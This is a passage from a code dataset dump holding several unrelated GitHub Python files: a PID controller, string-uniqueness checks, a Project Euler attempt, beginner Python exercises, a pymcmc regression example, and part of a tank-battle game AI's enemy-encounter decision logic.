        sse_ratio: Optional[float] = None,\n                 threshold_i_ctrlr: Optional[int] = None) -> None:\n        \n        \"\"\"Initializes the instance variables\"\"\"\n        # Setting constants\n        self._kp: Optional[float] = kp\n        self._ki: Optional[float] = ki\n        self._kd: Optional[float] = kd\n        self._max_input: Optional[float] = max_input\n        self._min_input: Optional[float] = min_input\n        self._sse_ratio: Optional[float] = sse_ratio\n        self._threshold_i_ctrlr: Optional[int] = threshold_i_ctrlr\n\n        # Initializing variables\n        self._last_time: float = time()\n        self._last_i_term: float = 0.\n        self._last_error: float = 0.\n        self._sse_range: float = 0.\n        self._counter: int = 0\n        self._i_counter: int = 0\n\n    def calc_input(self, error: float) -> float:\n        \"\"\"Calculates an input using PID controller\"\"\"\n        # Activating this if-statement only once\n        if self._counter == 0:\n            # Done in order to make the first delta_error 0\n            self._last_error = error\n            \n            # Calculating the steady-state error range, used in the integral controller\n            if self._sse_ratio is not None:\n                self._sse_range = error * self._sse_ratio\n            \n            # Making the counter non 0 so that it will not be activated from the next time\n            self._counter += 1\n        \n        # Preparing parameters\n        delta_error = error - self._last_error\n        current_time = time()\n        delta_time = current_time - self._last_time\n\n        # Calculating each term\n        if self._kp is not None:\n            p_term = self._calc_p_term(error)\n        else:\n            p_term = 0.\n        \n        if self._ki is not None:\n            if self._sse_ratio is not None and self._threshold_i_ctrlr is not None:\n                i_term = self._calc_i_term_sse(error, delta_time)\n            else:\n                i_term = self._calc_i_term(error, delta_time)\n        else:\n            i_term = 0.\n        \n        if self._kd is not None:\n            d_term = self._calc_d_term(delta_error, delta_time)\n        else:\n            d_term = 0.\n\n        # Calculating an input\n        input = p_term + i_term + d_term\n        if self._min_input is not None:\n            if input < self._min_input:\n                input = self._min_input\n        if self._max_input is not None:\n            if input > self._max_input:\n                input = self._max_input\n\n        # Saving parameters\n        self._last_error = error\n        self._last_time = current_time\n        self._last_i_term = i_term\n\n        return input\n    \n    def _calc_p_term(self, error: float) -> float:\n        
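A usage sketch for the PIDController being defined here (its remaining helper methods continue below): each iteration feeds the current error to calc_input and applies the returned input to a toy first-order plant. The gains and the plant model are made-up illustration values, not recommendations.

import time

pid = PIDController(kp=0.8, ki=0.2, kd=0.05, max_input=10.0, min_input=-10.0)

setpoint, measurement = 100.0, 0.0
for _ in range(20):
    error = setpoint - measurement
    u = pid.calc_input(error)
    measurement += 0.5 * u   # toy plant: moves by a fraction of the input
    time.sleep(0.01)         # calc_input derives dt from wall-clock time
print(round(measurement, 2))  # should approach the setpoint of 100.0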
\"\"\"Calculates a p_term\"\"\"\n return self._kp * error\n \n def _calc_i_term(self, error: float, delta_time: float) -> float:\n \"\"\"Calculates an i_term using trapezoidal rule\"\"\"\n delta_i_term = ((self._last_error + error) / 2) * delta_time \n return self._ki * (self._last_i_term + delta_i_term)\n\n def _calc_i_term_sse(self, error: float, delta_time: float) -> float:\n \"\"\"Calculates an i_term using trapezoidal rule or returns 0\n \n Note:\n -----\n This integral controller is activated only for eliminating steady-state error.\n \"\"\"\n \n # Increasing self._i_counter by 1 when the error is within the margin of error (moe)\n if -self._sse_range < error < self._sse_range:\n self._i_counter += 1\n else:\n self._last_i_term = 0\n self._i_counter = 0\n \n # Activating the integral controller when the steady-state error is detected\n if self._i_counter > self._threshold_i_ctrlr:\n delta_i_term = ((self._last_error + error) / 2) * delta_time \n return self._ki * (self._last_i_term + delta_i_term)\n else:\n return 0\n\n def _calc_d_term(self, delta_error: float, delta_time: float) -> float:\n \"\"\"Calculates a d_term using approximation\"\"\"\n return self._kd * (delta_error / delta_time)","repo_name":"FROM-THE-EARTH/canbeta","sub_path":"canbeta/parent/util/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29124122325","text":"\ndef is_unique(string):\n\ti = 0\n\twhile i < len(string):\n\t\tj = i + 1\n\t\twhile j < len(string):\n\t\t\tif string[i] == string[j]:\n\t\t\t\treturn False\n\t\t\tj = j + 1\n\t\ti = i + 1\n\treturn True\n\ndef is_unique_sorted(string):\n\tstring = sorted(string)\n\ti = 0\n\twhile i < len(string):\n\t\tj = i + 1\n\t\twhile j < len(string):\n\t\t\tif string[i] == string[j]:\n\t\t\t\treturn False\n\t\t\tj = j + 1\n\t\ti = i + 1\n\treturn True\n\ndef is_unique_ht(string):\n\tht = dict()\n\tfor char in string:\n\t\tif char in ht:\n\t\t\treturn False\n\t\telse:\n\t\t\tht[char] = True\n\treturn True \n\ndef main():\n\tstring = \"Omer\"\n\tiu = is_unique_ht(string.lower())\n\tprint(iu)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"sumeyyadede/algorithm-problems","sub_path":"is_unique.py","file_name":"is_unique.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10399462725","text":"# problem12.py\n\nimport math\n\nx = 0\nz = 0\nn = 1\n\ni = True\nwhile i != False:\n z = n * (n + 1) / 2\n x = 2\n \n y = int(math.sqrt(z))\n for k in range(2, y):\n if z % k == 0:\n x += 2\n if x == 500:\n i = False\n\n n += 1\n\nprint(z)\n","repo_name":"anpe9592/projectEuler","sub_path":"11-20/problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11301745125","text":"#name=input(\"please enter a name\\n\")\n\n#print('hello', name)\n\nr'''1\na = -100 ;b=200;c=0\n\nif(a>0):\n print(a)\n print(b)\n print('中文A')\nelif c ==0 :\n print('a!=0')\nelse:\n print(-a)\n print(-b)\n print('中文B')\n '''\n\nr'''2\nsum = 0\nfor i in range(1,100):\n sum += i\n \nprint(sum)\n\nsum=0 ;n=99\nwhile n>0:\n sum+=n\n n-=2\nprint(sum)\n\n#web 函数\n'''\n\ndef func1(param1, param2 = 5):\n if not isinstance(param1, (int, float)):\n raise TypeError('param1类型错误')\n elif not isinstance(param2, (int)):\n raise 
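The is_unique.py file earlier in this record implements the uniqueness check three ways (quadratic scan, sort-based, hash table). The idiomatic Python shortcut compares the string's length with its set of characters, since a set drops duplicates; a quick sketch (not part of the original file):

def is_unique_set(string):
    # equal lengths mean no character occurred twice
    return len(set(string)) == len(string)

print(is_unique_set("omer"))   # True
print(is_unique_set("hello"))  # False, 'l' repeats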
TypeError('param2类型错误')\n    m = 10;\n    if param1 >= 10:\n        m = param1;\n    elif param2 >= 10:\n        m=param2\n    else:\n        m=-1\n\n    return(m)\n\ndef nop():\n    pass\n\n#range([start,]end[,step]) starts at start, stops before stop (stop excluded), with step as the stride\nfor i in range(9,-1,-1):\n    print (i)\n\nfor i in range(9,0,-1):\n    print (i)\n\nimport math\ndef quadratic(a,b,c):\n    \n    if not isinstance(a,(int,float)):\n        raise TypeError('a type error')\n    elif not isinstance(b,(int,float)):\n        raise TypeError('b type error')\n    elif not isinstance(c,(int,float)):\n        raise TypeError('c type error')\n\n    if(b*b-4*a*c < 0):\n        raise ValueError(b*b-4*a*c)\n\n    return (-b+math.sqrt(b*b-4*a*c))/2/a, (-b-math.sqrt(b*b-4*a*c))/2/a\n\nL=[1,2,3]\ndef calc(n):\n    sum=0\n    for i in n:\n        sum += i**2\n    return sum\n\ndef calc2(*n):\n    sum=0\n    for i in n:\n        sum += i**2\n    return sum\n\ncalc(L)\ncalc2(*L)\ndict1 = {'mike':14, 'bob':56, 'lily':17, '13':13}\n\nfor k in dict1:\n    print(k)\n\nfor v in dict1.values():\n    print(v)\n\nfor k,v in dict1.items():\n    print(k,v)\n    \n\ndef person(name, age, **kws):\n    print('name:',name,'age:',age,'others:',kws)\n    if 'lily' in kws:\n        print('lily is here')\n\nperson('lily', 16, city='newyork')\nperson('lucy', 17, **dict1)\n\ndef person2(name, age, *, city, job):\n    print('name:',name,'age:',age,'city:',city,'job:',job)\n\nperson2('lily', 16, city='newyork', job='stu')\n\ndef person3(name, age, *others, city='harbin', job):\n    print('name:',name,'age:',age,'others:',others,'city:',city,'job:',job)\n\nperson3('lily', 16, [1,2],city='newyork', job='stu')\n\nperson3('lily',16,{'grade':3},job='stu')\n\n\ndef product(*L):\n    if len(L) == 0:\n        raise TypeError('L is empty')\n    else:\n        multi = 1\n        \n        for i in L:\n            multi *= i\n        \n        return multi\n\ntry:\n    product()\n    print('failed')\nexcept TypeError:\n    print('succ')\n\ndef temp(a,b,c):\n    print(a+b+c)\n\ndef fact(n):\n    if n == 1:\n        return 1;\n\n    return n*fact(n-1)\n\n# recursion\ndef hanoi(n,a,b,c):\n    if 1 == n:\n        print('move', a, '-->', c)\n    else:\n        hanoi(n-1, a, c, b)\n        hanoi(1, a, b, c)\n        hanoi(n-1, b, a, c)\n        \ndef myprint():\n    temp(1,2,3)\n    temp(*(1,2,3))\n    temp(**{'a':1,'b':2,'c':3})\n    print(fact(100))\n    hanoi(4,'a','b','c')\n\nmyprint()\n\n# slicing\nL1=['mike','lily','david','john','tim','sarah','jack','89',13]\n\nL1[:4]\nL1[0:4]\nL1[4:6]\nL1[-3:]\nL1[-4:-1]\nL1[:5:2]\nL1[::3]\n'ABCDEFGHIJK'[:3]\n'ABCDEFGHIJK'[::3]\n(0, 1, 2, 3, 4, 5)[:3]\n\nstr = ' hello world '\n\ndef trimC(s):\n    if 0 == len(s):\n        return s\n    \n    f=True\n    for t in s:\n        if t != ' ':\n            f=False\n\n    if f:\n        return ''\n\n    for i in range(0,len(s)):\n        if s[i] != ' ':\n            s = s[i:]\n            break\n    \n    for i in range(len(s)-1,-1,-1):\n        if s[i] != ' ':\n            s = s[:i+1]\n            break\n    \n    return s\n\ndef trimP(s):\n    while s[:1] == ' ':\n        s = s[1:]\n    \n    while s[-1:] == ' ':\n        s = s[:-1]\n    \n    return s\n    \n    \nprint('trimC:', trimC(str))\nprint('trimP:', trimP(str))\n\n\nfrom collections.abc import Iterable\n\nprint(isinstance('abc', Iterable))\n\nfor i,v in enumerate(['a', 'b', 'c']):\n    print(i,v)\n\nfor i,v in [(1,2), (2,4), (3,9), (9,'a')]:\n    print(i,v)\n\nfor i,v in enumerate([(1,2), (2,4), (3,9)]):\n    print(i,v)\n\ndef findMinAndMax(L):\n    a,b = None,None\n    \n    if [] == L:\n        return (a,b)\n\n    a=L[0];b=L[0]\n    for i in L:\n        if i<a:\n            a=i\n    for j in L:\n        if j>b:\n            b=j\n\n    return (a,b)\n\n","repo_name":"bingshuizhilian/Python","sub_path":"course/1-基础.py","file_name":"1-基础.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43079583997","text":"### More detailed examples are available in\n### when installing the 
pymcmc package\n### see the directory $PREFIX/pymcmc/examples/\n### where PREFIX is where the package was\n### installed (eg /usr/local/lib/python2.6/dist-packages/)\n\n### Empirical illustrations ###\n### Example 1: Linear regression model:\n### Variable selection and estimation\nimport os\nfrom numpy import loadtxt, hstack, ones, random, zeros, asfortranarray, log\nfrom pymcmc.mcmc import MCMC, CFsampler\nfrom pymcmc.regtools import StochasticSearch, BayesRegression\nimport pymcmc\n\n\"\"\" get the path for the data. If this was installed using setup.py\nit will be in the data directory of the module\"\"\"\ndatadir = os.path.join(os.path.dirname(pymcmc.__file__),'data')\n\ndef samplegamma(store):\n \"\"\"function that samples vector of indicators\"\"\"\n return store['SS'].sample_gamma(store)\n\ndata = loadtxt(os.path.join(datadir,'yld2.txt'))\nyvec = data[:, 0]\nxmat = data[:, 1:20]\nxmat = hstack([ones((xmat.shape[0], 1)), xmat])\n\n\"\"\"data is a dictionary whose elements are accessible from the functions\nin the MCMC sampler\"\"\"\ndata ={'yvec':yvec, 'xmat':xmat}\nprior = ['g_prior',zeros(xmat.shape[1]), 100.]\nSSVS = StochasticSearch(yvec, xmat, prior);\ndata['SS'] = SSVS\n\n\"\"\"initialise gamma\"\"\"\ninitgamma = zeros(xmat.shape[1], dtype ='i')\ninitgamma[0] = 1\nsimgam = CFsampler(samplegamma, initgamma, 'gamma', store ='all')\n\n\n# initialise class for MCMC samper\nrandom.seed(12346)\nms = MCMC(20000, 5000, data, [simgam])\nms.sampler()\nms.output()\nms.output(custom = SSVS.output)\n\ntxmat = SSVS.extract_regressors(0)\ng_prior = ['g_prior', 0.0, 100.]\nbreg = BayesRegression(yvec,txmat,prior = g_prior)\nbreg.output()\n\nbreg.plot()\n","repo_name":"rdenham/pymcmc","sub_path":"doc/example1_section3.1.py","file_name":"example1_section3.1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"12779838256","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2019-05-15 18:05:23\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-05-29 04:07:25\n\n__all__ = [\n\n \"EncountEnemyDecision\",\n\n ]\n\nfrom ..abstract import SingleDecisionMaker\nfrom ...utils import outer_label, debug_print\nfrom ...action import Action\nfrom ...field import BrickField\nfrom ...strategy.status import Status\nfrom ...strategy.label import Label\nfrom ...strategy.evaluate import evaluate_aggressive\nfrom .withdrawal import WithdrawalDecision\nfrom .base_defense import BaseDefenseDecision\n\n#{ BEGIN }#\n\nclass EncountEnemyDecision(SingleDecisionMaker):\n \"\"\"\n 遭遇敌人时的决策\n\n \"\"\"\n def _make_decision(self):\n\n player = self._player\n signal = self._signal\n map_ = player._map\n tank = player.tank\n battler = player.battler\n teammate = player.teammate\n\n Tank2Player = type(player)\n BattleTank = type(battler)\n\n aroundEnemies = battler.get_enemies_around()\n if len(aroundEnemies) > 0:\n player.set_status(Status.ENCOUNT_ENEMY)\n\n if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑\n assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠\n\n # 首先判断是否为真正的双人夹击\n enemy1, enemy2 = aroundEnemies\n x, y = tank.xy\n x1, y1 = enemy1.xy\n x2, y2 = enemy2.xy\n\n # 先判断敌人是否重叠,如果是,那么很有可能直接击杀!\n if (x1, y1) == (x2, y2):\n if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲\n and battler.canShoot\n ):\n player.set_status(Status.ENCOUNT_TWO_ENEMY)\n player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES)\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1)\n\n if x1 == x2 == x:\n if (y 
> y1 and y > y2) or (y < y1 and y < y2):\n player.set_status(Status.ENCOUNT_ONE_ENEMY)\n pass # 实际可视为一个人\n elif y1 == y2 == y:\n if (x > x1 and x > x2) or (x < x1 and x < x2):\n player.set_status(Status.ENCOUNT_ONE_ENEMY)\n pass\n else: # 真正的被夹击\n player.set_status(Status.ENCOUNT_TWO_ENEMY)\n oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ]\n if all( oppBattler.canShoot for oppBattler in oppBattlers ):\n # 如果两者都有弹药,可能要凉了 ...\n player.set_status(Status.DYING)\n if battler.canShoot:\n # TODO: 这种情况下有选择吗?\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1) # 随便打一个?\n elif all( not oppBattler.canShoot for oppBattler in oppBattlers ):\n # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向)\n firstMoveAction = tuple()\n attackAction = battler.get_next_attacking_action()\n if Action.is_move(attackAction): # 如果是移动行为\n firstMoveAction = ( attackAction, )\n for action in firstMoveAction + Action.MOVE_ACTIONS:\n if map_.is_valid_move_action(tank, action):\n with map_.simulate_one_action(tank, action):\n if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个\n if battler.canShoot:\n # TODO: 是否有选择?\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1) # 随便打一个\n else: # 有一个能射击,则反击他\n for oppBattler in oppBattlers:\n if oppBattler.canShoot: # 找到能射击的敌人\n actions = battler.try_dodge(oppBattler)\n if len(actions) == 0: # 不能闪避\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n else: # 要凉了 ...\n break\n elif len(actions) == 1:\n action = player.try_make_decision(actions[0])\n else:\n action = player.try_make_decision(actions[0],\n player.try_make_decision(actions[1]))\n if Action.is_move(action): # 统一判断\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 没有办法?尝试反击\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n else: # 要凉了\n break\n # 没有办法对付 ..\n player.set_status(Status.DYING)\n # 无所谓的办法了...\n return player.try_make_decision(battler.get_next_attacking_action())\n\n # TODO:\n # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17\n\n\n # 当前情况:\n # ---------\n # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架\n # 2. 敌人数量为 1\n #\n if len(aroundEnemies) == 1:\n oppTank = aroundEnemies[0]\n else: # len(aroundEnemies) == 2:\n oppTank = battler.get_nearest_enemy()\n oppBattler = BattleTank(oppTank)\n oppPlayer = Tank2Player(oppBattler)\n\n #\n # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7\n #\n if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)\n and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2)\n and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致\n ): # 上回合刚刚进入重叠,这回合就被打破\n with map_.rollback_to_previous():\n if oppTank is battler.get_overlapping_enemy():\n oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE)\n\n\n #\n # 在非 WITHDRAW 的情况下,评估当前侵略性\n #\n if not player.has_status(Status.WITHDRAW):\n _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL\n and not player.has_label(Label.DONT_WITHDRAW) )\n status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw)\n player.set_status(status)\n else:\n status = Status.WITHDRAW\n\n # 侵略模式/僵持模式\n #----------\n # 1. 优先拆家\n # 2. 只在必要的时刻还击\n # 3. 
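The decision code here leans on map_.simulate_one_action(...) as a context manager that applies a move, lets the caller inspect the resulting state, and rolls everything back on exit. A generic sketch of that simulate-then-revert pattern with contextlib (the Board class is a hypothetical minimal game state, not the Botzone API):

from contextlib import contextmanager

class Board:
    def __init__(self):
        self.positions = {"tank": (0, 0)}

    @contextmanager
    def simulate_one_action(self, piece, delta):
        old = self.positions[piece]
        self.positions[piece] = (old[0] + delta[0], old[1] + delta[1])
        try:
            yield self       # caller inspects the simulated state here
        finally:
            self.positions[piece] = old  # always roll back

board = Board()
with board.simulate_one_action("tank", (1, 0)):
    print(board.positions["tank"])  # (1, 0) inside the simulation
print(board.positions["tank"])      # (0, 0) restored afterwards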
闪避距离不宜远离拆家路线\n #\n if status == Status.AGGRESSIVE or status == Status.STALEMENT:\n if not oppBattler.canShoot:\n # 如果能直接打死,那当然是不能放弃的!!\n if len( oppBattler.try_dodge(battler) ) == 0: # 必死\n if battler.canShoot:\n player.set_status(Status.READY_TO_KILL_ENEMY)\n return battler.shoot_to(oppBattler)\n\n attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠\n realAction = player.try_make_decision(attackAction) # 默认的进攻路线\n if Action.is_stay(realAction): # 存在风险\n if Action.is_move(attackAction):\n #\n # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数\n #\n # TODO:\n # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的,\n # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被\n # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行\n # 特殊判断\n #\n fields = battler.get_destroyed_fields_if_shoot(attackAction)\n route = battler.get_shortest_attacking_route()\n for field in fields:\n if route.has_block(field): # 为 block 对象,该回合可以射击\n action = player.try_make_decision(battler.shoot_to(field))\n if Action.is_shoot(action):\n player.set_status(Status.PREVENT_BEING_KILLED)\n player.set_status(Status.KEEP_ON_MARCHING)\n return action\n # TODO: 此时开始判断是否为基地外墙,如果是,则射击\n for field in fields:\n if battler.check_is_outer_wall_of_enemy_base(field):\n action = player.try_make_decision(battler.shoot_to(field))\n if Action.is_shoot(action):\n player.set_status(Status.PREVENT_BEING_KILLED)\n player.set_status(Status.KEEP_ON_MARCHING)\n return action\n\n\n # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局\n #---------------------------------------------------\n # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。\n # 后退操作必须要有限制 5cd10315a51e681f0e900fa8\n #\n # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f\n #\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3)\n and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待\n and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来\n and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人\n and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局\n ):\n # 判断是否为反复回头\n if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过\n player.add_labels(Label.ALWAYS_BACK_AWAY)\n\n if (player.has_label(Label.ALWAYS_BACK_AWAY)\n and not battler.is_in_our_site(include_midline=True) # 严格不在我方基地\n ): # 考虑用闪避的方式代替后退\n for action in battler.try_dodge(oppBattler):\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY)\n player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态\n return realAction\n\n # 否则继续回头\n backMoveAction = battler.back_away_from(oppBattler)\n action = player.try_make_decision(backMoveAction)\n if Action.is_move(action):\n player.set_status(Status.READY_TO_BACK_AWAY)\n return action\n\n\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射\n and not battler.canShoot # 但是我方本回合不能射击\n and not oppBattler.canShoot # 并且对方本回合不能射击\n ):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持\n\n # 其余情况照常\n player.set_status(Status.PREVENT_BEING_KILLED)\n return realAction\n # 否则不予理会,直接移动或者反击\n action = player.try_make_decision(battler.get_next_attacking_action())\n if not Action.is_stay(action):\n # 补丁\n #----------------------------\n # 针对两者距离为 2 的情况,不能一概而论!\n #\n if status == Status.STALEMENT: # 僵持模式考虑堵路\n _route = battler.get_route_to_enemy_by_move(oppBattler)\n if _route.is_not_found():\n _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)\n assert not _route.is_not_found(), \"route not 
found ?\" # 必定能找到路!\n assert _route.length > 0, \"unexpected overlapping enemy\"\n if _route.length == 2:\n if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n # 其他情况均可以正常移动\n #player.set_status(Status.KEEP_ON_MARCHING)\n #return action\n return # 直接抛出让后面的 decision 处理,当做没有这个敌人\n\n # 不能移动,只好反击\n action = player.try_make_decision(battler.shoot_to(oppBattler))\n if Action.is_shoot(action):\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return action\n else:\n # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1\n #-----------------------------\n # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击\n # 2. 如果是僵持的,那么优先堵路,类似于 Defensive\n #\n # TODO:\n # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668\n #\n if status == Status.STALEMENT:\n #\n # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive\n #\n # TODO:\n # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59\n\n # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人\n # 这种情况下直接转为侵略模式!\n #\n if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)\n and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1)\n or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1))\n ):\n pass # 直接过到侵略模式\n else:\n # 否则算作正常的防守\n #\n # TODO:\n # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走!\n # 5ce4e66cd2337e01c7a6abd7\n #\n if battler.canShoot:\n\n #\n # (inserted) 先看上回合是不是刚被对方过掉\n #\n _justBreakOverlap = False\n with map_.rollback_to_previous():\n if (battler.has_overlapping_enemy()\n and oppTank is battler.get_overlapping_enemy()\n ): # 刚刚被对手打破重叠\n _justBreakOverlap = True\n\n _shouldShoot = False\n if _justBreakOverlap: # 刚刚被对手主动打破重叠\n for _route in battler.get_all_shortest_attacking_routes():\n if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是\n _shouldShoot = True # 回头堵路,那么继续保持射击\n break\n\n if _shouldShoot: # 正常防御\n player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射\n return battler.shoot_to(oppBattler)\n else:\n pass # 否则视为进攻逻辑\n\n # 闪避,尝试找最佳方案\n #-------------------------\n defenseAction = Action.STAY\n if battler.canShoot:\n defenseAction = battler.shoot_to(oppBattler)\n\n\n dodgeActions = battler.try_dodge(oppTank)\n\n if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现!\n\n #\n # 最佳方向是闪避向着进攻方向移动\n #\n attackAction = battler.get_next_attacking_action()\n for action in dodgeActions: # 与进攻方向相同的方向是最好的\n if Action.is_same_direction(action, attackAction):\n realAction = player.try_make_decision(action) # 风险评估\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction # 闪避加行军\n\n\n # 没有最佳的闪避方案,仍然尝试闪避\n #-----------------------------\n # 但是不能向着增加攻击线路长短的方向闪避!\n #\n route1 = battler.get_shortest_attacking_route()\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n with map_.simulate_one_action(battler, action):\n route2 = battler.get_shortest_attacking_route()\n if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合\n continue\n else:\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction\n\n #\n # 此时还可以考虑借力\n # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避\n #\n if (len(dodgeActions) > 0 # 存在可用的闪避行为\n and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑\n ):\n _shouldDodge = False\n action = dodgeActions[0]\n enemyShootAction = oppBattler.shoot_to(battler)\n with outer_label() as OUTER_BREAK:\n 
with map_.simulate_one_action(battler, action): # 假设闪走\n fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction)\n for field in fields:\n if isinstance(field, BrickField): # 对手会打掉墙\n for _route in battler.get_all_shortest_attacking_routes():\n if field.xy in _route: # 这个块在某一个最短的攻击路线上\n _shouldDodge = True\n raise OUTER_BREAK\n if _shouldDodge:\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction\n\n #\n # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击!\n # 5ccef443a51e681f0e8e64d8\n #-----------------------------------\n route1 = battler.get_shortest_attacking_route()\n if Action.is_shoot(defenseAction):\n player.set_status(Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n\n # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局\n #--------------------------------------------\n # 尝试往远处闪避,创造机会\n #\n # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙\n # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为\n # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的\n # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。\n # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了\n # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力\n # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61\n #\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4)\n and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止\n and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来\n and Action.is_stay(oppPlayer.get_previous_action(back=1))\n and Action.is_stay(oppPlayer.get_previous_action(back=3))\n and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人\n and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局\n 